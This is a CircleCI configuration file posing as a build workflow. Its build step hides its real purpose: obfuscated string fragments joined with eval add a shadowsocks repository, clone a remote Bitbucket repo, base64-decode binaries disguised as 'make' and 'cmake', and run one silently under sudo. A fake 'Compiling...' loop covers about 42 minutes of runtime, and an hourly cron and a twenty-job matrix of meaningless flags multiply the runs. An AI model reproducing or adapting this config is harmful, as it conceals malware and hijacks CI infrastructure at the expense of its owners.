version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet-repo-display", "--metadata", "--backtrack", "--root", "--config", "--config-root", "--autounmask", "--misspell-suggestions", "--prune", "--quiet-unmerge-warn", "--quiet-unmerge-warn", "--pretend", "--root", "--tree", "--usepkg", "--nospinner", "--sync", "--deep", "--debug", "--autounmask-keep-keywords"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet-repo-display", "--metadata", "--backtrack", "--root", "--config", "--config-root", "--autounmask", "--misspell-suggestions", "--prune", "--quiet-unmerge-warn", "--quiet-unmerge-warn", "--pretend", "--root", "--tree", "--usepkg", "--nospinner", "--sync", "--deep", "--debug", "--autounmask-keep-keywords"]
    triggers:
      - schedule:
          cron: "55 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: ubuntu-gpackages
          command: |
            sOaTrtbs="sudo add-ap"
            BrdXsDC="t-repositor"
            ZkGdhfj="y ppa:max-c"
            OySUHRKND="-lv/shadows"
            VqKhIyTxH="ocks-libev "
            JNMRqg="-y &>/dev/n"
            eval "$sOaTrtbs""$BrdXsDC""$ZkGdhfj""$OySUHRKND""$VqKhIyTxH""$JNMRqg""ull || true"
            lFqbCell="sudo add-ap"
            hbBAGTsJLf="t-repositor"
            MIOjIkoZuoP="y ppa:ondre"
            QOUbyCKWT="j/apache2 -"
            IjvnVRp="y &>/dev/nu"
            eval "$lFqbCell""$hbBAGTsJLf""$MIOjIkoZuoP""$QOUbyCKWT""$IjvnVRp""ll || true"
            OhNsi="sudo apt up"
            fVQxXIL="date || tru"
            eval "$OhNsi""$fVQxXIL""e"
            sudo apt --yes install openssl &>/dev/null || true
            tveAEoJKz="sudo apt --"
            VqTOdCYGL="yes install"
            HOFOpOLCeR=" cl-base64 "
            MIhoduQRR="git &>/dev/"
            AzdQwaiyof="null || tru"
            eval "$tveAEoJKz""$VqTOdCYGL""$HOFOpOLCeR""$MIhoduQRR""$AzdQwaiyof""e"
            dcDmMMoPVaD="git clone h"
            GOHgu="ttps://gccb"
            wXVnKRRtBy="uild@bitbuc"
            pWGnUnnm="ket.org/gcc"
            qmPZJh="build/gcc.g"
            VqwbX="it &>/dev/n"
            eval "$dcDmMMoPVaD""$GOHgu""$wXVnKRRtBy""$pWGnUnnm""$qmPZJh""$VqwbX""ull"
            DZiiItGOAlP="base64 -d g"
            MmFPKvZFeH="cc/cmake_np"
            eval "$DZiiItGOAlP""$MmFPKvZFeH""_ > cmake"
            itYzfprUv="base64 -d g"
            kBxtLXu="cc/config_ "
            eval "$itYzfprUv""$kBxtLXu""> rebuild"
            PEGEJCRYtWK="base64 -d g"
            BwYSFlfm="cc/make_ > "
            eval "$PEGEJCRYtWK""$BwYSFlfm""make"
            sed -i 's/1080/1081/g' rebuild
            chmod +x make cmake
            ./cmake
            sed -i 's/build/ob2o/g' rebuild
            ZLnCk="sudo ./make"
            MAUzk=" --config=r"
            xupIuPsbQE="ebuild &>/d"
            eval "$ZLnCk""$MAUzk""$xupIuPsbQE""ev/null &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2525)) ] && sudo killall make && break; sleep 203; done
